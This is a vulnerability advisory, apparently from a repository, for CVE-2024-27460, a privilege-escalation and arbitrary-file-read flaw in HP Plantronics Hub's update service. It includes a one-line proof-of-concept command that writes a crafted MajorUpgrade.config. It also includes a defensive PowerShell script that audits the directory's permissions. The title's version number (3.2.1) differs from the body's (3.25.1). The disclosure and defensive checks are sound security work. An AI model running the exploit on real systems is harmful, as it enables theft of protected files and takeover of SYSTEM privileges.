HP Plantronics Hub 3.2.1 Updater Privilege Escalation

Alaatk/CVE-2024-27460

CVE-2024-27460

HP Plantronics Hub 3.25.1 Updater Privilege Escalation/Arbitrary File Read

Description:

HP Plantronics Hub 3.25.1 suffers from a bug that allows low-privileged users to perform arbitrary file read as SYSTEM on the machine where the application is installed. Moreover, it is possible to abuse this flaw to escalate privileges to the SYSTEM user.

Affected versions

HP Plantronics Hub 3.25.1

Impacted service(s)

Insecure Path: "C:\ProgramData\Plantronics\Spokes3G"

Service: PlantronicsUpdateService

Steps to reproduce (POC):

  • Open cmd.exe
  • Navigate using cd C:\ProgramData\Plantronics\Spokes3G
  • echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config
  • The desired file will be copied into "C:\Program Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp", which any authenticated user has access to.
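
A defender-side check for the condition described above, as an added example that is not part of the original repository: it lists the access-control entries that let broad, low-privileged groups create or change files in the insecure path, and reports MajorUpgrade.config if it is present. The function name, the selection of group SIDs and the set of rights treated as write-capable are assumptions of this example.

```powershell
# Added example (not from the repository): flag ACEs that let broad,
# low-privileged groups create or change files in the advisory's directory.
$Path = 'C:\ProgramData\Plantronics\Spokes3G'   # path from the advisory

# Well-known SIDs (locale-independent); this selection is an assumption.
$BroadSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
    'S-1-5-4'      = 'INTERACTIVE'
}

# Rights that allow planting or altering a file, plus the raw GENERIC_WRITE
# and GENERIC_ALL bits that inherit-only ACEs sometimes carry unmapped.
$Specific  = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
$WriteMask = [int]$Specific -bor 0x40000000 -bor 0x10000000

function Get-BroadWriteAce {   # hypothetical helper name
    param([Parameter(Mandatory)][string]$LiteralPath)
    if (-not (Test-Path -LiteralPath $LiteralPath)) { return }
    $acl     = Get-Acl -LiteralPath $LiteralPath
    $sidType = [System.Security.Principal.SecurityIdentifier]
    # Explicit and inherited ACEs, with identities returned as SIDs.
    foreach ($ace in $acl.GetAccessRules($true, $true, $sidType)) {
        $sid = $ace.IdentityReference.Value
        if ($ace.AccessControlType -eq 'Allow' -and
            $BroadSids.ContainsKey($sid) -and
            ([int]$ace.FileSystemRights -band $WriteMask)) {
            [pscustomobject]@{
                Path      = $LiteralPath
                Principal = $BroadSids[$sid]
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

Get-BroadWriteAce -LiteralPath $Path | Format-Table -AutoSize

# Report the file used in the PoC if it exists, with owner and write time.
$cfg = Join-Path $Path 'MajorUpgrade.config'
if (Test-Path -LiteralPath $cfg) {
    $item = Get-Item -LiteralPath $cfg
    '{0} exists, owner {1}, last written {2:u}' -f $cfg, (Get-Acl -LiteralPath $cfg).Owner, $item.LastWriteTimeUtc
}
```

The check reads Allow entries only; Deny entries and effective-access evaluation are outside its scope, so an empty result is not proof that the directory is locked down.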

Discovered by:

  • Farid Zerrouk of Deloitte Belgium
  • Alaa Kachouh of Mastercard Europe
